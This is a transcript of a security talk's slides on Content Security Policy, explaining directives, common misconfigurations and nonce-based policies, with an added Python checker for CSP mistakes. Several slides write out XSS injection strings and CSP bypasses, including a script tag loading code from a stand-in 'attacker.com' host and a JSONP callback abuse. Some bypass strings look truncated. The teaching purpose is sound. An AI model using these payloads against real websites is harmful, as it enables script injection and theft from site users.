Slide 1

Saturday day live with CSP by Artur Hil

Slide 2

What the hell is this?

Content Security Policy (CSP) is a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from the execution of malicious content in the trusted web page context.

Slide 3

Yay! We don't need any input validation now!
... to prevent XSS, clickjacking and code injection attacks

Slide 4

Actually, NO.

CSP provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on that website.

Slide 5

Ambitious goals of CSP

● Mitigate risk
  ● Control over resources
  ● Control over execution
● Reduce privilege of the application
  ● Content is forced into a unique origin
● Detect exploitation by monitoring violations
  ● Collecting violation reports

Slide 6

CSP directives... many, for many different problems

media-src, base-uri, font-src, plugin-types, connect-src, style-src, script-src, child-src, report-to, navigate-to, form-action, sandbox, script-src-elem, prefetch-src, worker-src

Slide 7

What it looks like. Bad example:

Slide 8

What it looks like. Good example:

Slide 9

How does it work?

example.com serves the CSP:
default-src 'self'; script-src 'self' good.com; report-uri /csp_alert_logger;

Diagram: example.com, good.com

Slide 10

How does it work?

example.com serves the CSP:
default-src 'self'; script-src 'self' good.com; report-uri /csp_alert_logger;

Diagram: example.com, good.com

Injected: ">'><script src="//attacker.com/evil.js">
  -> reported to example.com/csp_alert_logger: source not whitelisted

Injected: ">'><script>alert(balalaya)
  -> reported to example.com/csp_alert_logger: inline scripts are not allowed

Slide 11

I deployed CSP! Now I'm safe!

Not exactly: trivial mistake #1

script-src 'self' 'unsafe-inline'; object-src 'none';

'unsafe-inline' in script-src instead of 'nonce'
Same for 'default-src' if the script-src directive is not set

Bypass: ">'> alert(12345)

Slide 12

I deployed CSP! Now I'm safe!

Not exactly: trivial mistake #2

script-src 'self' https: data: *; object-src 'none';

URL schemes or a wildcard in script-src instead of 'unsafe-dynamic'
Same for URL schemes and a wildcard in 'object-src'

Bypass: ">'>

Slide 13

I deployed CSP! Now I'm safe!

Not exactly: trivial mistake #3

script-src 'self';

Looks secure, but... the object-src or default-src directive is missing

Bypass: ">'>

Slide 14

I deployed CSP! Now I'm safe!

Not exactly: trivial mistake #4

script-src 'self'; object-src 'none';

Allowing 'self' while hosting user-provided content on the same origin
Same for the object-src or default-src directive

Bypass: ">'>

Slide 15

Whitelisting JSONP is a problem

script-src 'self' https://whitelisted.com; object-src 'none';

JSONP-like endpoint in the whitelist

Bypass: ">'>

Slide 16

Whitelisting JSONP is a problem

CSP: script-src 'self' https://whitelisted.com; object-src 'none';

Diagram: JSONP responses from whitelisted.com, e.g. alert(12345);u({...}) and x.click({...})

Bypass: ">'><script src="https://whitelisted.com/jsonp?callback=x.click">

Don't whitelist JSONP endpoints!

Slide 17

Angular JS library in the whitelist

script-src 'self' https://whitelisted.com; object-src 'none';

">'>
{{2+2}}
">'>

Slide 18

How to make a safe CSP: https://csp-evaluator.withgoogle.com/

Slide 19

How to make a safe CSP: https://cspvalidator.org

Slide 20

Best way to make CSP safe

script-src 'nonce-r4nd0m123'; object-src 'none';

Benefits:
● All tags with the correct nonce attribute will be executed
● <script> tags injected via XSS will be blocked because of the missing nonce
● No host/path whitelists! --> NO BYPASSES

Slide 21

How does nonce work?

example.com serves the CSP:
default-src 'self'; script-src 'self' 'nonce-r4nd0m123'; report-uri /csp_alert_logger;

Diagram: example.com, good.com

Injected: ">'><script src="//attacker.com/evil.js">
Injected: ">'><script>alert(balalaya)
  -> reported to example.com/csp_alert_logger: script without correct nonce

Slide 22

What it looks like. Good example:

Slide 23

A new way to make CSP (CSP V.3)

script-src 'nonce-r4nd0m123' 'unsafe-dynamic'; object-src 'none';

● nonce-r4nd0m123 - allows all scripts to execute if the correct nonce is set.
● unsafe-dynamic - propagates trust and discards whitelists
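Added example, not from the slides: a small Python checker for trivial mistakes #1 to #3 from the earlier slides (mistake #4, user-provided content on the same origin, cannot be seen from the header alone), plus per-response nonce generation for the nonce-based policy shown above. The directive parsing is a simplified assumption rather than the full CSP grammar, and the function names are mine.

```python
import base64
import re
import secrets

# Policies copied from the "trivial mistake" slides (straight ASCII quotes).
MISTAKE_1 = "script-src 'self' 'unsafe-inline'; object-src 'none';"
MISTAKE_2 = "script-src 'self' https: data: *; object-src 'none';"
MISTAKE_3 = "script-src 'self';"


def parse_csp(policy):
    """Split a CSP header value into {directive: [source expressions]} (simplified)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def check_csp(policy):
    """Flag the trivial mistakes #1-#3; an empty list means none were found."""
    d = parse_csp(policy)
    findings = []
    # script-src falls back to default-src when it is absent
    script = d.get("script-src", d.get("default-src", []))
    # a nonce or hash makes browsers ignore 'unsafe-inline', so only flag it without one
    has_nonce_or_hash = any(re.match(r"'(nonce-|sha(256|384|512)-)", s) for s in script)
    if "'unsafe-inline'" in script and not has_nonce_or_hash:
        findings.append("#1 'unsafe-inline' in script-src without a nonce")
    for src in script:
        # bare schemes ("https:", "data:") and "*" let any host serve scripts
        if src == "*" or re.fullmatch(r"[a-z][a-z0-9+.-]*:", src):
            findings.append(f"#2 scheme or wildcard source in script-src: {src}")
    if "object-src" not in d and "default-src" not in d:
        findings.append("#3 missing object-src (and no default-src fallback)")
    return findings


def make_nonce():
    """Fresh, unguessable nonce per response: 128 random bits, base64 as CSP expects."""
    return base64.b64encode(secrets.token_bytes(16)).decode()


def nonce_policy(nonce):
    """The nonce-based policy from the slides with a freshly generated nonce."""
    return f"script-src 'nonce-{nonce}'; object-src 'none';"


def render_script(nonce, body):
    """Only script tags carrying the nonce from the header are allowed to run."""
    return f'<script nonce="{nonce}">{body}</script>'
```

Generate a new nonce for every response and use the same value in the header and in the page; a nonce reused across responses is as weak as a whitelist.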

Slide 24

QUESTIONS?